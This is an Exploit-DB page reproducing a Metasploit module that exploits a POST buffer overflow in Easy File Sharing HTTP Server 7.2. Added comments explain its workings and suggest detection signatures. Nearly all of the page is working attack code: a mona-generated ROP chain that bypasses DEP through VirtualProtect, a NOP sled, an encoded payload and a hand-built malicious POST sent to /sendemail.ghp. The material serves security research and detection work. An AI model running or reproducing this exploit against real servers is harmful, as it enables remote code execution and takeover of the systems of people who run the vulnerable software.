Easy File Sharing HTTP Server 7.2 – POST Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2017-06-17
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/42256/
  • ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    # Metasploit exploit module for the Easy File Sharing HTTP Server 7.2 POST
    # buffer overflow (this page: EDB 42256; the PoC referenced below: EDB 42186).
    # One oversized POST to /sendemail.ghp overflows a stack buffer through the
    # `Email` form field; the overwritten return address ('Ret' in Targets) leads
    # into the chain from #create_rop_chain, which goes through VirtualProtect
    # (a DEP bypass) before the NOP sled and the encoded payload.
    #
    # Defender notes, all derived from what #exploit actually sends:
    #   * The request is HTTP/1.1 with no headers at all (no Host, no
    #     Content-Length) and an `Email=` value of several KiB made of uppercase
    #     filler, binary ROP/NOP bytes and an alphanumeric-encoded payload.
    #     A length limit on that parameter at a WAF/reverse proxy, or an IDS rule
    #     for POST /sendemail.ghp carrying a body but no Content-Length, is a
    #     practical detection for this and similar attempts.
    #   * Gadget addresses are hard-coded for ImageLoad.dll and sqlite3.dll, so
    #     the chain presumably relies on those modules loading at fixed bases
    #     (not ASLR-rebased) — inferred from the addresses, not verified here.
    #   * 'Privileged' => true signals that a successful run is expected to
    #     execute in the server process's security context; the remedy is
    #     patching or removing the affected version, not input hardening alone.
    class MetasploitModule < Msf::Exploit::Remote
    
    Rank = NormalRanking
    
    # Raw TCP only: the HttpClient mixin stays commented out because the request
    # in #exploit is hand-built (no headers) and written straight to the socket.
    include Msf::Exploit::Remote::Tcp
    #include Msf::Exploit::Remote::HttpClient
    
    # Registers the module's metadata with the framework.
    #
    # @param info [Hash] base info hash merged via update_info
    # NOTE(review): the Description literal says "FTP Server" although the
    # Name, RPORT 80 and the HTTP POST in #exploit all target the HTTP server —
    # presumably a copy-paste slip; the literal is left unchanged here.
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow',
    'Description'=> %q{
    This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
    },
    'Author' =>
    [
    'bl4ck h4ck3r', # original proof of concept (EDB 42186)
    'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' # Metasploit module
    ],
    'License'=> MSF_LICENSE,
    'References' =>
    [
    [ 'EDB', '42186' ],
    ],
    'Privileged' => true,
    # Bytes the encoder must not emit. They include the URL-encoded form
    # delimiters (&, =, %, +), whitespace and line terminators — presumably
    # because they would cut or rewrite the Email field before it reaches the
    # vulnerable copy; the exact reason for each byte is not shown on this page.
    'Payload'=>
    {
    'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
    },
    'Platform' => 'win',
    # 'Ret' is the value packed onto the end of the buffer in #exploit. It lies
    # in the same 0x1002xxxx range as the ImageLoad.dll gadgets listed in
    # #create_rop_chain, so it appears to be an address in that DLL — not
    # confirmed from this page.
    'Targets'=>
    [
    [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ],
    ],
    # x86/alpha_mixed keeps the encoded payload alphanumeric, which sidesteps
    # the BadChars above; 'thread' is the framework's exit-thread-rather-than-
    # process option, presumably chosen so the service survives the payload.
    'DefaultOptions' => {
    'RPORT' => 80,
    'EXITFUNC' => 'thread',
    'ENCODER' => 'x86/alpha_mixed'
    },
    'DisclosureDate' => 'Jun 12 2017',
    'DefaultTarget'=> 0))
    end
    
    # Builds the ROP chain that precedes the NOP sled in the overflow buffer.
    #
    # The list was emitted by mona.py (corelan); the `#` annotation after each
    # address is mona's description of that gadget and is kept verbatim. The
    # first, commented-out entry is mona reporting that it found no gadget to
    # load 0x201 into EBX directly, so the chain instead pops -202 into EAX,
    # negates it and adds it to EBX. The 64 consecutive INC EDX gadgets that
    # follow XOR EDX,EDX leave EDX = 0x40, consistent with the VirtualProtect
    # call that the "ptr to &VirtualProtect()" entry sets up — inferred from
    # mona's annotations, not executed here.
    #
    # @return [String] the gadget addresses packed as little-endian 32-bit words
    def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
    # 0x00000000,# [-] Unable to find gadget to put 00000201 into ebx
    0x10015442,# POP EAX # RETN [ImageLoad.dll]
    0xFFFFFDFE,# -202
    0x100231d1,# NEG EAX # RETN [ImageLoad.dll]
    0x1001da09,# ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
    0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
    0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
    0x10015442,# POP EAX # RETN [ImageLoad.dll]
    0x1004de84,# &Writable location [ImageLoad.dll]
    0x10015442,# POP EAX # RETN [ImageLoad.dll]
    0x61c832d0,# ptr to &VirtualProtect() [IAT sqlite3.dll]
    0x1002248c,# MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
    0x61c0a798,# XCHG EAX,EDI # RETN [sqlite3.dll]
    0x1001d626,# XOR ESI,ESI # RETN [ImageLoad.dll]
    0x10021a3e,# ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
    0x100218f9,# POP EBP # RETN [ImageLoad.dll]
    0x61c24169,# & push esp # ret[sqlite3.dll]
    0x10022c4c,# XOR EDX,EDX # RETN [ImageLoad.dll]
    # 64 x INC EDX below (0x40 in total); see the method comment.
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
    0x1001bd98,# POP ECX # RETN [ImageLoad.dll]
    0x1004de84,# &Writable location [ImageLoad.dll]
    0x61c373a4,# POP EDI # RETN [sqlite3.dll]
    0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
    0x10015442,# POP EAX # RETN [ImageLoad.dll]
    0x90909090,# nop
    0x100240c2,# PUSHAD # RETN [ImageLoad.dll]
    # 'V*' packs each entry as an unsigned 32-bit little-endian word.
    ].flatten.pack('V*')
    return rop_gadgets
    end
    
    # Sends the single malicious POST and hands control to the payload handler.
    #
    # Buffer layout, in order: 2278 bytes of random uppercase filler, the ROP
    # chain, a 200-byte NOP sled, the encoded payload, filler that pads the
    # chain+sled+payload region to exactly 1794 bytes, then target.ret. The
    # padding arithmetic assumes chain, sled and payload together fit in 1794
    # bytes; nothing here guards against a negative length reaching
    # rand_text_alpha_upper (that helper's behaviour on a negative length is not
    # shown on this page). payload.encoded is referenced twice; as far as I know
    # the framework caches the encoded payload so both references see the same
    # bytes — assumed, not shown here.
    def exploit
    sploit = rand_text_alpha_upper(2278)
    rop_chain = create_rop_chain
    sploit << rop_chain
    sploit << "\x90" * 200
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length)
    sploit << [target.ret].pack('V')
    
    # Bare HTTP/1.1 request: no Host, no Content-Type, no Content-Length; the
    # body is just Email=<buffer>&getPassword=Get+Password. Those omissions are
    # themselves a usable detection signature for this module.
    request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password"
    connect
    # Written once; no response is read before the payload handler takes over.
    sock.put(request)
    handler
    disconnect
    end
    end